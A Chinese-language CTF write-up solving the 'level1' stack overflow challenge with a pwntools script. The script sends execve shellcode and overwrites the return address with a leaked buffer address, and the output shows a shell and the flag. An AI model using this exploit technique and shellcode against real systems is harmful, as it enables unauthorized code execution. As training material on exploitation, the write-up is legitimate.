1.题目信息

BUUCTF在线评测

2.原理

篡改栈帧上的返回地址为攻击者手动传入的shellcode所在缓冲区地址，并且该区域有执行权限。

root@pwn_test1604:/ctf/work/9# gdb ./level1
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level1...(no debugging symbols found)...done.
pwndbg> r
Starting program: /ctf/work/9/level1 
What's this:0xffffd670?
12345678
Hello, World!
[Inferior 1 (process 1530) exited normally]

3.解题步骤

3.1 首先使用checksec工具查看它开了啥保护措施

基本全关，栈可执行。

root@pwn_test1604:/ctf/work/9# checksec ./level1
[*] '/ctf/work/9/level1'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX disabledPIE:      No PIE (0x8048000)RWX:      Has RWX segments
root@pwn_test1604:/ctf/work/9# 

3.2 使用ida查看一下该程序

在危险函数中，程序向我们输出了一个栈站上的地址因此我们可以朝buf写一段shellcode，然后 将返回地址覆盖为buf的地址。在pwntools中可以使用shellcraft.sh()写shellcode，再使用asm将其转换成机器码。

ida帮我们计算出来了buf字符串距离rbp有0x88个字节，由于ebp本身还占4个字节，所以溢出0x8c个字节后将返回地址修改为buf地址，python有 个自带的方法ljust可以将我们的shellcode长度补充为固定字节，期作用是使shellcode左对齐，然后不足长度补齐指定数据。

3.3 完整源码

#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'
#context.arch='i386'DEBUG = 1LOCAL = True
BIN   ='./level1'
HOST  ='pwn2.jarvisoj.com'
PORT  =9877
#HOST  ='node5.buuoj.cn'
#PORT  =29787def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):s = p.recv()addr = bytes.decode(s)[12:-2]shellcode = asm(shellcraft.sh())pl = shellcode.ljust(0x8c,b'A') + p32(int(addr,16))p.sendline(pl)p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)

只用修改的地方如下： 

BIN   ='./level1'
HOST  ='pwn2.jarvisoj.com'
PORT  =9877

def exploit(p):

    
    s = p.recv()
    addr = bytes.decode(s)[12:-2]
    

    shellcode = asm(shellcraft.sh())
    pl = shellcode.ljust(0x8c,b'A') + p32(int(addr,16))
    p.sendline(pl)
    p.interactive()
    return

 3.4 运行结果

root@pwn_test1604:/ctf/work/9# python level1.py  1
[DEBUG] PLT 0x8048330 read
[DEBUG] PLT 0x8048340 printf
[DEBUG] PLT 0x8048350 __gmon_start__
[DEBUG] PLT 0x8048360 __libc_start_main
[DEBUG] PLT 0x8048370 write
[*] '/ctf/work/9/level1'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX disabledPIE:      No PIE (0x8048000)RWX:      Has RWX segments
[+] Opening connection to pwn2.jarvisoj.com on port 9877: Done
[DEBUG] Received 0x18 bytes:"What's this:0xff9c03e0?\n"
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,"awx".global _start.global __start_start:__start:.intel_syntax noprefix/* execve(path='/bin///sh', argv=['sh'], envp=0) *//* push '/bin///sh\x00' */push 0x68push 0x732f2f2fpush 0x6e69622fmov ebx, esp/* push argument array ['sh\x00'] *//* push 'sh\x00\x00' */push 0x1010101xor dword ptr [esp], 0x1016972xor ecx, ecxpush ecx /* null terminate */push 4pop ecxadd ecx, esppush ecx /* 'sh\x00' */mov ecx, espxor edx, edx/* call execve() */push 11 /* 0xb */pop eaxint 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-CH1oM0/step2 /tmp/pwn-asm-CH1oM0/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-CH1oM0/step3 /tmp/pwn-asm-CH1oM0/step4
[DEBUG] Sent 0x91 bytes:00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80  41 41 41 41  │··Q·│·1·j│·X··│AAAA│00000030  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│*00000080  41 41 41 41  41 41 41 41  41 41 41 41  e0 03 9c ff  │AAAA│AAAA│AAAA│····│00000090  0a                                                  │·│00000091
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:'ls\n'
[DEBUG] Received 0xc bytes:'flag\n''level1\n'
flag
level1
$ cat flag
[DEBUG] Sent 0x9 bytes:'cat flag\n'
[DEBUG] Received 0x26 bytes:'CTF{82c2aa534a9dede9c3a0045d0fec8617}\n'
CTF{82c2aa534a9dede9c3a0045d0fec8617}
$